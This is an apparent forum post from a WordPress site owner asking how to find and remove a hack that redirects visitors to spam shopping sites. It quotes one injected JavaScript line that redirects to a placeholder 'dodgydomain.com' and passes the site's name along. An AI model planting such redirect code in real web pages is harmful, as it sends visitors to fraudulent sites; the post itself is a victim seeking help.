Malicious Javascript redirect spam added to head

I have a site that on the face of it appears normal. But whilst using Google’s webmaster tools I noticed some unusual search result activity. There was a distinct spike in incoming searches for Nike trainers. which would be great if thats what the site sold. It doesn’t.

The search results all came through as pages that have not been created by wordpress, nor are they technically part of the site each result returns a page address similar to that of one or two pages on the site but with a search query at the end eg: https://www.mydomain/page/?2015-nike-10115.html. Obviously a hack.

On following one of these results the page redirects to a handful of bogus site purporting to sell stuff.

The redirect is slow so I’ve been able to pause it mid way, before the redirect, so I could stop the page loading and view the source. The page appears to have a piece of javascript added to the very beginning of the head right before the doctype is declared in each case it reads something like
window.location.href="https://dodgydomain.com/page.php?c2=1&n=www.mydomain.com&tt=/page/?2015-nike-10115.html"
The remainder of the page is as the rest of the site. It even updates if I make changes elsewhere, so clearly there’s something been messed about with either within the theme or within wordpress itself.

My first question is how do I find it to remove it?
eg, what ma I looking for. I have tried searching for the obvious – the url that it redirects to, Nike, that sort of thing, but no result.

Other than that it occurred to me that it could be something in WordPress itself. So can I basically do a clean install of WordPress upload my theme and point that at the existing database?

Thanks

Craig